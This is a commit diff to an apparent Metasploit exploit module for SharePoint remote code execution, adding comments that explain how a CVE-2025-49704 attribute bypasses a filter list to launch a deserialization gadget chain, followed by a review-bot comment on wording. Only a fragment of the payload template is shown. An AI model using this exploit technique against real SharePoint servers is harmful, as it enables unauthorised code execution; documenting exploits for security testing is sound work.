Commit 8df7f64

add some comments to clarify what CVE-2025-49704 is
1 parent 6d9d9a7 commit 8df7f64

File tree

1 file changed

+3
-0
lines changed
modules/exploits/windows/http/sharepoint_toolpane_rce.rb

Lines changed: 3 additions & 0 deletions
@@ -166,6 +166,9 @@ def self.generate(nested_gadget_b64)
166166
name_b = Rex::Text.rand_text_alpha_lower(8..16)
167167
name_c = Rex::Text.rand_text_alpha_lower(8..16)
168168

169+
# The msdata:DataType attribute below is CVE-2025-49704, and allows bypassing a filter list so we can instantiate
170+
# LosFormatter and ObjectDataProvider in the diffgr:diffgram XML document below, allowing us to kcik off a second
171+
# stage deserialization gadget (which will be a TypeConfuseDelegate + LosFormatter gadget chain).
169172
schema = <<~EOF
170173
<xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="#{name_a}">
171174
<xs:element name="#{name_a}" msdata:IsDataSet="true" msdata:UseCurrentLocale="true">
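Review bot: the new comment at lines 169-171 has a typo, "kcik off" should be "kick off", and its first sentence reads as if the attribute itself were the CVE; since the rest of the sentence describes a filter-list bypass, something like `# The msdata:DataType attribute below exploits CVE-2025-49704, a filter list bypass that lets us instantiate` states the relationship more precisely while keeping the same content. Also consider wrapping the three comment lines to the width used elsewhere in this file so they read cleanly in a narrow diff view.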